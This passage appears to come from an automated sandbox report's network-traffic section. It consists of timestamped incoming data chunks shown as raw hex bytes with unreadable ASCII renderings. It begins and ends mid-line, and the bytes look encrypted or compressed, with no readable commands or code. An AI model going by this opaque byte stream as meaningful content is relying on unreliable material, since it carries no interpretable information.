71 94 21 b1 13 e6 4e 8e 29 4f ee 1e 72 8e a9 1d f0 8e b0 60 31 84 63 d2 95 a2 8d a9 03 8c c3 6a ce a0 Data Ascii: 8C6:9PEj gfm5@j+a!I:,U^(qx 1RNV+<]%^[V1^g*>I4i."VA]mb8x2lv8K=SVd LqD\|4RB2Qgp9iq!N)Or`1cj
2022-10-03 14:13:31 UTC	125	IN	Data Raw: ee b5 23 79 50 9b d5 2e 3f cd cd a8 9f 50 e8 26 2b 18 79 f4 c0 af eb 6b 4e 31 83 2c a2 57 cc 6d 64 32 8c c7 a1 dc 7b ae 7c a1 a4 7a dc a9 12 42 57 39 3a f2 eb a8 de 4c 72 3d fd f1 85 5e a8 d8 b9 e7 ae 07 88 6d 6c e2 23 09 d3 3b 6d 4a b1 68 b9 c6 36 b3 13 ac cd 95 92 4e 57 43 6d 7f cc 19 10 b5 be f4 d8 d5 b5 d8 1f cd 4d 3b 1e f0 5a ea f1 2c 58 d8 ad b1 98 35 45 9e fc e5 4b 9b 76 54 b0 10 63 fd 8c 86 08 26 a2 b9 d8 92 a1 46 75 e6 44 ff eb 76 21 12 8f 86 95 b7 5b b2 88 0d 4d 53 c7 6c 62 ad 87 15 b6 44 50 ba 03 27 bf 73 de 44 e6 0b 29 08 a8 86 73 d0 b9 3a 6b c6 8a 6f 6f 82 08 03 2c 83 ed 2a 4a 5b 50 cf 5a 8e a7 ae ce 4d 4a 75 89 0b 55 89 d0 c8 93 84 c5 4a 9f 89 cc 2f 9b 41 5b 83 97 15 8b 26 db 97 3f da a5 17 6f cb 0b df 4e 14 11 d6 82 2d ab 53 9b 60 c7 1a 4b Data Ascii: #yP.?P&+ykN1,Wmd2{\|zBW9:Lr=^ml#;mJh6NWCmM;Z,X5EKvTc&FuDv![MSlbDP'sD)s:koo,*J[PZMJuUJ/A[&?oN-S`K
2022-10-03 14:13:31 UTC	126	IN	Data Raw: 5d 96 b6 3e 86 77 c6 5c 08 cc 91 43 5b 1a 47 e9 c6 ab 86 f7 ca 12 63 06 06 14 7a 2b 74 ce 5d 45 87 3f 0e 11 a7 77 fa 10 43 7a 24 40 b5 af 07 86 92 03 26 e0 be 70 cf ed f1 e6 94 32 d4 d9 8a 23 ae 44 ed a4 69 d9 36 84 87 37 5d f6 02 86 c7 77 8e 8c 44 e7 e6 9d 4c 88 87 8e 4b 1a 6a 21 85 cf 2a a1 10 3d 4b 9e b7 d3 04 21 5c 5b 85 b6 96 a9 d1 2a aa c2 ac 8c b7 c7 31 7a c1 ae 5f 2f 18 e4 10 5e be f9 39 d9 98 84 7f 2c 10 5b 72 0f 73 be 98 d5 14 f6 0b b8 7b fa 4a f0 d1 3d 88 83 2c cd 13 8e 40 1d dc e7 bd 70 89 bf 7f 6f 53 e9 ed 4c 76 7a 64 95 98 05 1a ff 57 d7 ad 90 eb 6a 51 ac a8 d7 e5 3c 36 0a 03 b6 59 13 83 b6 8d ef c6 6e ba 50 96 81 0f 39 1e 83 4f e4 91 03 0f 95 fd 4b 12 e0 6b 05 24 77 14 4d 58 9e 89 7a 18 5c aa 21 46 17 78 4f b1 55 18 5c 93 ac a2 b6 e1 c7 2d Data Ascii: ]>w\C[Gcz+t]E?wCz$@&p2#Di67]wDLKj!=K!\[1z_/^9,[rs{J=,@poSLvzdWjQ<6YnP9OKk$wMXz\!FxOU\-
2022-10-03 14:13:31 UTC	127	IN	Data Raw: 02 93 d5 c0 ee 81 b7 c7 78 f7 d2 e2 f9 d2 ac 57 a7 4c fc ad 7f 86 39 30 88 76 bd fd be 19 44 76 18 ea 44 bb 77 21 36 44 66 5f 08 d7 38 1c 0e dc 1e 75 42 c9 96 e8 9f 57 2f c4 9b d5 2c 0a d8 29 e2 b3 5f ca 26 4a a2 32 dd ce 89 eb 7c 46 64 82 2c a4 67 62 e8 0a 33 8a e9 eb 22 14 af 7c 3f 9e 48 54 aa 1f cc 71 26 25 f2 2e ac de 4c 77 19 2e 0b 84 58 84 98 45 f6 c0 06 8c 76 6c f9 06 24 dd 87 57 47 80 f8 99 47 36 a9 3b 77 4f 91 94 64 25 15 f9 7f cc 1b 25 16 5a be f4 db 97 e7 bc ed f7 3b 84 d5 6d d3 2c 0d da de 87 db c6 df 40 9e f8 e3 41 fa 52 79 b8 1c fe a1 c3 39 08 22 82 20 f0 69 a0 dc 56 e1 3f a7 a4 f4 21 16 90 85 87 96 76 bc b9 3a 95 72 05 6a 48 2f e2 52 4c 45 54 9c ad 4d c1 1c 45 61 cf 05 2b b2 09 ab 7d f6 86 97 4f 01 8a 77 47 62 21 f8 2b a9 69 7e 4f 24 3f ca Data Ascii: xWL90vDvDw!6Df_8uBW/,)_&J2\|Fd,gb3"\|?HTq&%.Lw.XEvl$WGG6;wOd%%Z;m,@ARy9" iV?!v:rjH/RLETMEa+}OwGb!+i~O$?
2022-10-03 14:13:31 UTC	129	IN	Data Raw: 9c 98 c4 4a 92 c0 6d 24 56 e5 63 5f 1a 68 65 53 4d 52 a0 f5 55 b8 18 73 fe 6a bb 84 0a 92 e9 41 72 68 e9 46 e2 44 fa 74 2f 75 6c 68 fc 16 e5 e0 59 2e 03 1f 58 7c 9b 1e 18 99 3a 7c 2d 27 de b7 74 d5 e1 46 e9 e0 ae ee 89 a5 0c 6f 2a e2 5b e0 08 73 43 05 35 c8 1f 5f 33 00 77 e5 1b f1 a4 08 51 95 a5 ce f8 fd 02 06 df a7 3f 55 d3 f4 12 b3 2d 9d d3 68 5f c1 45 f2 aa 61 8a 37 84 81 87 12 a5 7c a1 e7 db 91 dc de e2 8b 95 6a 97 cc 86 da 19 6a 27 b3 61 af cf 11 3b 65 d4 60 bc 05 21 c2 61 f9 3e 95 a4 76 0c b5 93 ac b9 b3 c7 31 7f e5 7d a5 2e 1e c8 50 a2 af 97 38 dd 83 f6 4f 09 3d 55 ce 35 0c 8f ca f7 be f6 12 90 a0 aa 4c f6 fb 4d de 17 2c cd 11 bb 95 f9 96 cb b3 52 b6 47 5f 18 51 73 c8 7d 4c a7 45 3e 9e 2f 70 a1 6d d0 ad 94 eb 35 e3 72 84 d9 c5 09 e4 54 11 b5 59 17 Data Ascii: Jm$Vc_heSMRUsjArhFDt/ulhY.X\|:\|-'tFo*[sC5_3wQ?U-h_Ea7\|jj'a;e`!a>v1}.P8O=U5LM,RG_Qs}LE>/pm5rTY
2022-10-03 14:13:31 UTC	129	IN	Data Raw: 84 0e ee b3 3e de 62 64 a8 fd 2e b1 2b 3a e0 be ee 8e 39 fb 27 9c 89 c4 30 70 e9 0b b5 4e 14 11 5b 8f fb b8 75 bd f1 ad 64 24 9a 11 2e 69 69 22 9d 63 bb 10 17 f2 b1 aa 27 b1 81 d1 46 6d 32 88 a2 68 48 ec a7 76 33 d7 c8 8a 9e 2e c1 34 35 0d 15 d0 25 79 77 29 68 c6 d8 34 6c da c3 21 4e 78 49 1c 70 fc 9f 6f e3 51 6a ef ab 4e f2 40 b1 5f 64 0e 33 20 b5 1b 1e 77 6b a4 b4 0a ab d7 68 48 87 0e 39 ba b0 f8 de 04 50 5e a4 e5 9a a2 6b db 27 3e 38 b0 76 c9 73 9d b8 d7 66 14 be 1d 2e 7e 1a 42 e0 1c 42 e3 b7 07 7e b2 d7 55 a2 18 73 fe d0 e1 ae 18 b4 d6 e9 5a 93 e8 66 c4 68 78 0a 5f 7b 44 97 dd d6 e3 ca df ca 49 33 49 5e 9b 78 18 99 3a c6 84 0d cc 91 4d 5b 1a 47 e9 c6 ab 6a f7 ca 12 63 06 39 9b e0 0e 59 5b 5e 77 d8 39 7b d2 a7 77 e5 3b e4 86 25 40 aa ad 92 f9 fd 04 0c Data Ascii: >bd.+:9'0pN[ud$.ii"c'Fm2hHv3.45%yw)h4l!NxIpoQjN@_d3 wkhH9P^k'>8vsf.~BB~UsZfhx_{DI3I^x:M[Gjc9Y[^w9{w;%@
2022-10-03 14:13:31 UTC	131	IN	Data Raw: 3d 3a 7d 1a 7e b4 b4 24 9e f3 38 12 85 69 05 24 4b 53 bc 59 9e 95 78 89 23 c5 26 6c 91 19 76 2a 70 31 72 57 b3 f4 96 f1 e0 00 28 76 47 e7 a0 30 67 c3 a6 cf 1c 80 7a ed 8b ca bf c1 9d 9c 08 4c b0 19 db 0f 92 d6 b0 30 8e 50 8f be 3c bf 0c b0 60 3b 78 3f d8 95 a3 84 81 f8 8f c3 61 e4 84 01 46 fd b1 3f fc 43 5b bd e5 90 9e 09 22 df b2 cc b7 69 87 44 bd e0 5d 7b 69 b8 e8 4c 8e 43 69 b9 06 16 be 78 fb 3b 5b fa 93 35 20 c5 29 11 89 08 45 e7 37 05 40 68 ec f7 2c db 20 44 dc aa 51 24 58 13 bb bc bd b8 78 87 9d 38 a6 cd 38 4c 39 43 40 d8 1e cd e0 88 9c 37 66 4a 35 ec e8 91 d4 eb b4 73 81 6e 31 96 08 c6 01 6e 39 8a f2 c8 97 d3 c8 a5 4f ba e2 d2 df 68 d5 cd d1 68 db 60 07 ac 65 a8 e8 b3 f6 1f 96 93 c4 56 ad 76 1c f5 a0 04 7f 1d 1f 42 91 21 28 b2 1c bd 04 c3 17 47 91 Data Ascii: =:}~$8i$KSYx#&lv*p1rW(vG0gzL0P<`;x?aF?C["iD]{iLCix;[5 )E7@h, DQ$Xx88L9C@7fJ5sn1n9Ohh`eVvB!(G
2022-10-03 14:13:31 UTC	132	IN	Data Raw: 9f 49 4f bc ba 1d 45 44 50 bc 09 ea ca 1c df 5f ca ef 0c 92 8b 81 fb 88 c9 1f 4b 05 aa 66 6e 99 20 62 08 ae f9 26 00 2c 3e ce 5a aa 14 80 54 68 78 60 87 ef 71 a9 1a e2 15 fa b1 63 64 8c ec 23 b0 2b 25 76 b3 38 9d 1f dd 07 1b f7 ab 11 b7 e6 2b 0e 51 19 39 3a ab d6 ac 79 1b 34 c2 65 24 be 0c 22 68 69 3d 23 6e 6d 03 31 d4 90 29 59 de a0 05 49 4d 8e 97 b5 40 29 c8 8a 61 3f 75 0a e5 9f 2e e5 75 3e 0c 15 c8 97 a7 5b 38 48 cc 56 4b 03 db e3 ce 65 c5 49 00 58 9d bb 42 f4 5d cc 2c c4 4f f2 64 f2 55 65 0e 2a 92 6b 37 0c 57 61 2f cb 65 aa f7 9d 63 39 0e 26 a2 02 26 f2 16 70 54 9c 9b f5 a3 4b b9 00 30 39 af 6f 7b ad b1 aa f7 6c 9c c1 72 2f 5e 17 6e 5f 1c 5d e8 05 d9 52 a0 f7 5f 9b 66 1c ff f0 9a 89 17 b5 c9 e4 e8 4d c4 74 e4 62 f5 75 30 7a 64 87 f1 16 e3 d5 c4 78 97 Data Ascii: IOEDP_Kfn b&,>ZThx`qcd#+%v8+Q9:y4e$"hi=#nm1)YIM@)a?u.u>[8HVKeIXB],OdUe*k7Wa/ec9&&pTK09o{lr/^n_]R_fMtbu0zdx
2022-10-03 14:13:31 UTC	133	IN	Data Raw: 3d 17 6d e8 f8 ca b7 76 b9 ed 5f 18 cb cc c0 42 78 a1 4a 94 9e 2f 50 bf 36 d6 ad 8b ea 16 30 88 85 df e9 a1 1c 45 7f b4 5d 33 ae 9f 76 ee 5c 4d bd 2b ce ce 3e 38 1a 9c 3a 22 ba 2e 01 af ca e5 33 64 6f 2f a2 15 53 b7 59 9a af 61 73 22 c5 ba 63 3e 75 3f 0b 41 34 52 b5 93 96 98 6b c5 32 2e 78 9c 04 a0 36 4d 65 ab aa 1d 80 67 e5 42 ca bf c7 2d 3b 5b 31 97 39 ed 2e 71 d6 90 49 1a 75 a2 b0 14 b7 14 b1 60 3d 72 cf ac fa a2 9d ad 23 bd c2 67 ce 9c 5a 04 ee 97 1b ef a6 5b bd c5 8d b5 24 33 e6 82 00 4c 68 87 62 ee 68 23 14 70 90 17 6d ba 44 43 3b e2 5c 92 69 d9 3b 8a fb 93 35 9a 77 0a 00 af 36 88 1c 36 05 66 39 60 89 43 c1 08 bb fd 9f 56 0e da f7 f1 90 af 9a 78 54 9c 38 a6 77 82 6f 28 65 7f 2c 36 36 e1 a8 1a 17 e0 34 40 c5 13 94 f4 db 9f f5 ff 9b 15 bb 1e c0 c6 58 Data Ascii: =mv_BxJ/P60E]3v\M+>8:".3do/SYas"c>u?A4Rk2.x6MegB-;[19.qIu`=r#gZ[$3Lhbh#pmDC;\i;5w66f9`CVxT8wo(e,664@X
2022-10-03 14:13:31 UTC	135	IN	Data Raw: 2b 1e f0 5f d0 22 d6 59 de 81 f1 64 24 2b 9f f8 fe 49 57 52 79 be ac 59 f2 bd 1e 28 70 a3 a3 f0 49 ec 56 73 cc 30 a9 7f 76 21 10 ba 23 71 fd 77 bc aa 32 39 72 05 6c f8 88 b1 2f 6b 65 07 bd 29 4d e1 48 cf 44 e2 0b 07 ba 76 aa 7d f0 8c 98 35 6e 8b 6f 6b b9 78 f9 2d 83 71 25 0d 37 19 ee 02 8b b8 8b 74 36 77 7b af 0b 79 81 e7 c9 93 82 f4 e4 1a e7 cd 29 b5 0b 7c ed 96 15 15 1c d0 1f 3c d7 f2 30 70 ed 0b 69 5e 14 11 de 8a fe 51 52 9d 4c 87 e6 5a d5 2d 29 6d 49 67 b8 4b 40 8b 32 d9 8a 0e 79 84 81 d1 42 6d 09 98 a2 68 cc e1 71 66 15 f1 5e 0c e0 41 e0 55 36 2d 4e c9 0d 82 ec 0c 43 fe 7c 6a 58 da c3 25 4e 4a 59 1c 70 79 ad 6a 09 76 4a 54 81 c8 8c 0f d3 58 60 2e 76 09 4e 1a 84 54 6c 30 ec 45 f6 d6 6c 68 19 a8 29 ba 2a c2 e5 3e 8d 7f 1a e3 b0 24 35 d2 21 3e 3c 8f 32 Data Ascii: +_"Yd$+IWRyY(pIVs0v!#qw29rl/ke)MHDv}5nokx-q%7t6w{y)\|<0pi^QRLZ-)mIgK@2yBmhqf^AU6-NC\|jX%NJYpyjvJTX`.vNTl0Elh)*>$5!><2
2022-10-03 14:13:31 UTC	136	IN	Data Raw: 69 c6 0a 93 f8 de 0c b5 b3 ea ee b5 c7 2e 44 c1 ae 5f 2f 18 e4 fc 5e be f9 39 d9 a7 ab e4 09 3d cf 71 3d 33 b8 cc aa 15 f6 12 b0 0a e9 4a f6 e4 74 de 17 2c cd 11 bb 95 f9 96 cb b3 52 b6 92 5e 18 51 73 c8 7d 4c a7 45 eb 9f 2f 70 a1 95 c4 ad 94 eb 1a e3 72 84 d9 c5 09 e4 54 11 b5 59 17 be e1 77 ee c6 f2 b5 17 fa c8 2e 46 1b 9c 1a 5e 65 3c 01 b3 fd 11 1a 9f 68 05 22 41 ba c8 36 9f 8f 54 52 a2 c4 20 46 89 42 34 39 56 15 d2 b4 b3 f4 b6 8b d7 2d 39 4f 43 2d 5b 31 67 e5 ff 43 62 ef 62 c5 74 eb 3e c6 b7 1e ec 06 9c 0b f9 0f f0 d7 b0 30 34 71 b1 af 1a 80 fc 98 9b 3a 58 4f f8 13 dd f2 a8 03 8a e3 e5 cf 06 7f b3 d9 9c 29 fa 87 d9 bc e5 0a 9b 33 20 f9 92 37 93 41 7c 65 c4 ec 77 fd 0f ff 12 4d 8a 65 c0 3a 78 79 25 5d d2 09 98 da 10 34 ba e0 24 3b bc 28 a0 f8 12 2d 9b Data Ascii: i.D_/^9=q=3Jt,R^Qs}LE/prTYw.F^e<h"A6TR FB49V-9OC-[1gCbbt>04q:XO)3 7A\|ewMe:xy%]4$;(-
2022-10-03 14:13:31 UTC	137	IN	Data Raw: a0 23 69 15 02 d0 26 59 82 b2 5d ad 82 15 aa 52 ef 79 06 24 fd 91 67 6a 91 c1 b5 ee cd a8 3b 51 e6 13 ea 0b 3c 3d 06 5e 68 1c 0f 94 be f4 d8 c9 b5 e7 9a ec f7 3b 3e 68 55 c2 0a 32 78 f6 7c da e6 5c 6e 18 86 95 68 01 57 59 1b 37 7c df 36 1d 25 34 84 83 55 68 a0 46 53 74 3b 81 84 68 2c 3e 6b a4 0f 94 5c 3a d0 7d 6f 73 01 4c c4 ac 9c 3d d7 60 7d ae 0f 6d 67 1d df 44 c2 d1 18 92 8d b4 71 de 5d 1f 4b 07 a0 e9 11 f6 21 f8 29 a3 4c 01 20 25 a5 eb 77 98 9e ab f3 69 67 7b 8f c5 65 a9 1c d7 99 ac 25 63 64 8e e6 af cf 44 24 ec 92 35 27 38 fd 0d 80 d2 86 23 56 cd 83 0f 4e 14 31 1a bf d6 aa 4c 96 62 56 65 24 bc 06 af 17 06 3c b9 4f 60 b8 16 f4 9b b2 7c f3 92 f7 62 e4 8f 88 a2 48 34 dc 8a 67 0a c1 5c 71 9f 2e e7 7f b0 73 7a c9 0d 86 56 83 6f ec 5a d0 26 f6 d2 03 4e 6f Data Ascii: #i&Y]Ry$gj;Q<=^h;>hU2x\|\nhWY7\|6%4UhFSt;h,>k\:}osL=`}mgDq]K!)L %wig{e%cdD$5'8#VN1LbVe$<O`\|bH4g\q.szVoZ&No
2022-10-03 14:13:31 UTC	138	IN	Data Raw: 55 d7 cc c1 49 2c 9b ff c0 a7 d0 2b f3 ae 45 02 fd 85 81 1d ad ad 40 95 e1 53 5b dd de c2 eb 43 7d 97 d7 b1 2c 30 91 20 99 e1 fb 26 6e 54 60 f4 cd 9c ce 20 58 44 4e 09 9e 96 f9 2c 7e 92 8c fc 95 1a 26 60 e9 4a 51 07 e5 cf 7a 26 fb 7a 47 b2 86 d6 e1 29 f1 54 54 10 bb bb c1 c6 32 d6 de 91 80 fb 6a 1a ec 57 f6 f4 05 36 16 91 15 ad 7f b4 dc 57 96 e8 7f d5 50 e9 ed ca 7b ac 77 b3 be e2 71 81 38 f6 43 83 f4 3e d4 95 ad 22 c2 23 64 00 f8 ca 36 12 9e 9a 56 20 c7 68 90 a0 cd c3 1c 1f 3a 52 1b 7e b4 0e 0b ab e2 1e 2d 6d 41 fe 25 6b 3a 9c db e0 e0 51 72 26 e5 ef 47 13 67 83 0e 5d 24 74 95 7c f5 96 6b e5 3e 21 50 67 12 88 cb 66 e3 d3 ef 9a fe 0c c4 70 cf 9f 17 b6 1e 76 b9 94 34 cd 09 51 06 b1 30 14 55 b6 b7 1a 9f f0 b9 48 c0 59 49 d4 bf 21 e3 c6 02 8e c7 47 1f 07 7f Data Ascii: UI,+E@S[C},0 &nT` XDN,~&`JQz&zG)TT2jW6WP{wq8C>"#d6V h:R~-mA%k:Qr&Gg]$t\|k>!Pgfpv4Q0UHYI!G
2022-10-03 14:13:31 UTC	140	IN	Data Raw: ad 11 aa aa 9a d3 02 93 d9 dc c6 9e 54 cc c8 34 82 5c 43 eb a4 e6 53 4e 6e 82 2c a2 6d 98 8f 65 32 95 f0 e3 59 15 af 7a 8f 39 1b 29 8d 3f 48 51 d4 24 d2 59 32 fb 61 79 33 26 02 84 58 82 92 5e 91 af 07 90 5a b7 79 06 22 f7 9f 0c 05 90 de bd e6 c5 a8 3b 57 56 b0 b9 75 1b 1d f1 7f cc 1d 2f 0b 3d d1 f5 c2 bb 3c 3f ed f1 11 9c 8e 2f c3 0a 29 78 2a 86 db e6 c0 61 b3 e9 dc 49 f5 52 79 be 16 de c6 ac 38 13 0e 59 a2 f0 6f 8a c4 0d a3 2f 81 80 57 d4 17 90 a5 95 b7 5b ad 88 32 9b 72 05 6c 42 0a 85 3d 4d 5e 78 47 28 4d c7 36 5d 3a 8d 15 0d 96 ad 5d 7c f6 a6 84 6e 2c 9b 49 4f 6f 21 f8 2d a3 47 19 20 25 24 e6 a1 8b b8 8d 7e ea 19 14 ae 14 74 89 eb c9 93 84 44 47 49 99 ea 09 46 2a 25 ec b6 a4 96 39 fd 13 32 0c aa 31 76 c7 ad 70 21 15 11 c5 8a 2e ab 53 9d d0 88 49 36 9c Data Ascii: T4\CSNn,me2Yz9)?HQ$Y2ay3&X^Zy";WVu/=<?/)xaIRy8Yo/W[2rlB=M^xG(M6]:]\|n,IOo!-G %$~tDGIF%921vp!.SI6
2022-10-03 14:13:31 UTC	141	IN	Data Raw: 1a a3 18 99 25 ec 20 f1 cd 91 52 59 67 38 86 c1 81 ec a9 bd 11 63 02 83 7f cd 1c 7f e1 63 58 c9 1f 7b b8 bc 77 e5 04 60 a9 de 41 b3 83 43 7a 83 6d 27 e4 a5 1f 4c ca dc e9 28 08 b6 e8 cc 01 b7 46 f2 ae 61 94 2c 84 81 01 1f 73 6c 87 c1 59 13 a2 b1 c3 cb 97 4a 8d d5 ae 21 82 4f 0c 88 c1 f1 ba 12 3b 61 d4 75 a7 05 21 45 6c 2f 2d b3 82 f5 8e cb fc 8d fc b1 e7 2a 62 e9 55 c4 0a 33 df 5c 00 ca fa 39 dd a7 15 fe 09 3d 4b 7c eb 20 9e ea fd 92 88 7d 91 80 ff 6a ea f9 57 f6 76 08 e0 05 b7 33 9b fb ca b3 76 5d f7 5f 18 4e c8 c5 ab 5f 81 63 bf 1c 51 1f 80 38 d2 8d 89 f6 3e cb 13 a0 f4 d2 05 42 37 7c b4 59 33 72 85 76 ee dc 40 6b 3b e8 e8 24 bb 64 f3 1b 7e b0 0e 1f b1 e2 1e a8 41 44 14 02 4b 22 b4 59 9e af a0 69 22 c5 39 6e e8 66 19 2d 5a b7 2c da b2 f4 92 4b da 2f 39 Data Ascii: % RYg8ccX{w`ACzm'L(Fa,slYJ!O;au!El/-*bU3\9=K\| }jWv3v]_N_cQ8>B7\|Y3rv@k;$d~ADK"Yi"9nf-Z,K/9
2022-10-03 14:13:31 UTC	142	IN	Data Raw: d3 b8 c1 ee a5 09 a7 e2 d2 e2 c4 24 cc d1 71 ec ce 82 c2 64 ae c6 11 b7 72 97 93 5a 53 68 64 3a d5 05 23 52 0c 19 ca 64 21 28 ad 36 34 f5 c2 17 5b 93 4e e8 81 b4 39 55 8b da d7 28 15 3d 96 ea 8c 76 cc 79 37 82 5c f9 7c 94 f4 75 71 93 ab d7 a3 4d e2 bc e7 4c e5 ec cb a6 34 ee 7e a5 bb ff 63 a1 2e 6a 51 67 27 d2 59 88 60 51 68 15 1b d8 7e 59 82 b4 ed 0e d1 68 8d 72 48 58 44 26 dd 1d e8 4f bc cc 9f e6 74 ab 3b 57 ec 50 89 64 3d 22 08 56 37 1c 0f 92 0e 57 8b b4 92 c7 3a cd b4 39 1e f0 da e7 27 3f 7e fe c4 d9 e6 5a 64 51 e5 fa 69 1e 58 51 45 37 7c d9 86 ba 76 49 a3 a3 f4 49 e4 44 73 cc b4 a4 a9 66 07 36 d4 a7 0f 92 56 66 b3 12 6e 6f 2d 97 63 ad 9a 17 cf 3b 3f bd 29 49 e1 59 dd 44 e2 8e 28 bf 9c 8d 5d b3 a4 1e 4b 21 6a 72 6f 99 3c d0 d6 82 eb 06 0a a3 41 a1 5b Data Ascii: $qdrZShd:#Rd!(64[N9U(=vy7\\|uqML4~c.jQg'Y`Qh~YhrHXD&Ot;WPd="V7W:9'?~ZdQiXQE7\|vIIDsf6Vfno-c;?)IYD(]K!jro<A[
2022-10-03 14:13:31 UTC	143	IN	Data Raw: 98 b4 4e 92 c0 e8 0a 53 0f 44 7f 79 40 e3 2d 02 30 81 f1 75 06 30 88 ff f0 98 83 9a ca a6 e5 72 6c c9 00 c0 42 fa ee 15 57 55 b5 dd 70 e1 ca df 70 04 3f 58 78 a6 90 e3 98 3a e0 22 88 b2 fe 55 73 e5 66 8e c2 81 e8 13 80 3e 72 24 39 3d e2 0e 59 e1 14 7b c9 1f 45 3b 5c 76 e5 1d 41 03 5b 2f b2 85 6d d8 95 00 26 e4 3b 1a 78 d9 fa c9 da 2f 9b f9 ca 56 8f 44 f2 b0 69 d9 36 84 87 37 b1 f6 02 86 c7 77 b1 b5 dc c2 cb 09 4f ba c5 88 01 71 68 21 99 c7 ae 81 10 3b 7e fa e1 47 04 21 5e 6e 52 52 dc 85 df 08 95 f9 8e fc b5 5d 14 4d fb 73 7e 45 1c ce 7a 00 5c d9 39 dd 98 da cd f2 3c 55 52 3a a3 e0 83 d6 14 f2 32 fb 82 fb 4a 6c de 7a e7 ca 0d a6 15 91 13 a7 60 eb b3 56 8b c4 a4 19 51 ef c7 d6 20 ee 64 95 9a 0f 1c 83 38 d6 37 b1 d9 2c ed a9 e9 db c3 23 42 8a 5f b4 59 0c 81 Data Ascii: NSDy@-0u0rlBWUpp?Xx:"Usf>r$9=Y{E;\vA[/m&;x/VDi67wOqh!;~G!^nRR]Ms~Ez\9<UR:2Jlz`VQ d87,#B_Y
2022-10-03 14:13:31 UTC	145	IN	Data Raw: 43 c1 08 bb fd 26 55 0e da f7 f1 90 af 9a 78 ed 9f 38 a6 77 73 42 28 65 7f 28 36 36 e1 a8 1a 17 e0 34 40 c5 13 94 f4 60 9c f5 ff 9b 15 bb 1e c0 c6 e3 3b 8a 68 cd 3e e2 ee 85 b7 b3 ca 29 fe ec d9 e7 57 09 a9 49 fc a9 45 20 c0 31 88 ea b2 be d2 50 65 f8 1e f5 3a 01 df 2f 39 62 66 2d 00 49 3d 1c 08 e9 95 23 d6 c9 96 ea 95 b6 53 ab 9a 4f 0d 38 b6 95 e7 11 52 ec 39 15 1b 7f d9 ce 91 dc 8e 6f 9f 85 06 24 33 8b 97 65 36 aa 7d c9 a2 14 35 59 88 a9 43 66 1c 3d 4c 71 06 be f1 59 a8 c1 46 40 ee 07 f0 83 72 04 cc a8 89 af 03 ac e3 4e 78 06 be f8 30 60 4c b1 4f bb c6 36 89 9e 74 cc 95 8b 40 15 c6 03 7e ca 37 89 ea 4b d0 f5 df b3 55 3c ed f7 a1 3b dd 52 e4 2a bf 5a de 87 fb 2f 79 44 9e e7 ea 41 fa 52 79 b8 1c fa a1 c3 39 08 22 82 30 f2 69 a0 dc 56 e1 3c a7 a4 e4 23 16 Data Ascii: C&Ux8wsB(e(664@`;h>)WIE 1Pe:/9bf-I=#SO8R9o$3e6}5YCf=LqYF@rNx0`LO6t@~7KU<;R*Z/yDARy9"0iV<#
2022-10-03 14:13:31 UTC	145	IN	Data Raw: e1 9d 1a 78 9e a8 7f dc e3 1e 36 44 cb 07 24 6b a6 93 74 8c a9 70 d0 20 c5 20 66 d5 43 19 2b 6f 1d 7a 4e b2 f4 90 41 47 53 56 51 67 01 80 93 65 e3 d5 5f 39 ad 72 e3 50 68 bd c7 b7 3e 98 07 b1 19 c8 07 8a d7 b0 36 3e f7 dc c0 1b 9f eb 90 c4 39 58 49 48 b0 8e 8c 8f 23 2a c1 67 ce 26 90 0d fc b1 2c f4 5c 5a bd e3 20 3d 5a 5c f8 92 2c 97 cc 85 64 c4 70 78 56 63 b6 33 e8 8c 45 43 1b 88 5d bf 78 e0 14 96 01 92 35 bc ca 82 7e c0 29 a0 e3 17 a3 62 13 e6 6d 09 ed 1a 99 fd 0c 55 0e da 4d 2b 99 bd bc 47 6f b5 c3 a7 57 1b 4b ae 1b 0f 3f 1e c9 c0 0f 1e 3d 66 d0 0a e9 01 b6 f4 4a 9c f5 ff 21 3d b3 0c e6 f9 72 11 71 69 ed bc eb 68 fb c7 bb e2 d6 df 44 dd cd d1 ed e3 65 ee 8b 45 06 c0 31 88 50 be b6 c0 76 5a 6b 34 0e 3b 21 54 26 bf 1c 16 20 28 b6 1c b5 0c c3 17 c7 9c e5 Data Ascii: x6D$ktp fC+ozNAGSVQge_9rPh>6>9XIH#*g&,\Z =Z\,dpxVc3EC]x5~)bmUM+GoWK?=fJ!=rqihDeE1PvZk4;!T& (
2022-10-03 14:13:31 UTC	147	IN	Data Raw: 6e 62 ad bc 7a 6a 45 50 a0 01 b6 c0 1c d9 6e 60 6a 62 93 8d af 5d 3f a4 1e 4b 9b af 42 7e bf 00 31 2f 83 eb 20 6d 02 3f ce 47 a2 43 8a 54 6e 4d fd d1 7b 71 a9 18 e8 59 86 de 62 fe ad e1 3b 97 0b ef ee 96 15 af 6d da 0d 1a e8 a5 19 8b ec 2b 08 64 92 6f ae ab d6 ae 73 56 48 ad 64 be 9f 01 3b 4f 49 f6 bb 4b 40 31 75 d3 9b 28 46 c8 a8 2a 43 4d 88 a2 24 16 bd c8 8a 63 35 3b 76 8a 9e b4 c4 78 20 2b 35 04 0f 82 76 09 16 cb 5a 4a 1c ce eb de 6f c5 4f 36 f2 18 d5 43 f2 73 6a 9f a9 4e f2 fa f7 75 75 28 0a c5 4c 1a 1e 51 cc 05 ca 65 bd ff 97 69 39 08 13 38 54 b2 f2 16 72 5e d4 e7 9a a2 d1 98 0d 2f 1e 8f a1 e3 88 9c 98 5f 6b 92 c0 6a 07 85 1f 62 59 36 c0 9d 42 23 53 a4 d1 ba 1f 18 73 64 d5 b3 b8 3e 94 06 e6 72 68 c9 f6 e5 42 fa 63 18 81 45 93 fb 3c 61 b4 b0 51 6c 1a Data Ascii: nbzjEPn`jb]?KB~1/ m?GCTnM{qYb;m+dosVHd;OIK@1u(F*CM$c5;vx +5vZJoO6CsjNuu(LQei98Tr^/_kjbY6B#Ssd>rhBcE<aQl
2022-10-03 14:13:31 UTC	148	IN	Data Raw: 91 0e af 02 cb b3 50 bc 6a 21 77 50 e9 e9 70 ae 83 65 95 04 0a 5d 93 1e f6 5d 96 f4 3e eb 0c ad d9 c3 3c 6c 02 85 b5 59 15 b4 18 08 81 c7 68 94 1a 19 ec 0e 39 80 b9 37 6c 92 0e f0 b1 e2 1e 12 f7 41 05 24 74 37 9e a2 9f 8f 56 58 a4 bb 4f 47 13 63 39 d9 72 35 52 2f 96 d9 84 4d e5 df 3b 50 67 25 3e 18 67 e3 ca fc 34 7b 62 c5 76 e1 39 b9 d8 1f 76 27 91 ea dd 2f 71 4c 95 1d 06 53 82 5c 18 9f ef 90 b7 13 58 49 cd 85 8b 66 a8 03 88 e9 e1 b0 69 7e 29 f8 91 cf de a7 5b 27 c0 27 a9 02 13 0d 90 28 b7 49 60 4c c4 ea 42 75 59 6b 12 4d 88 6f c5 45 17 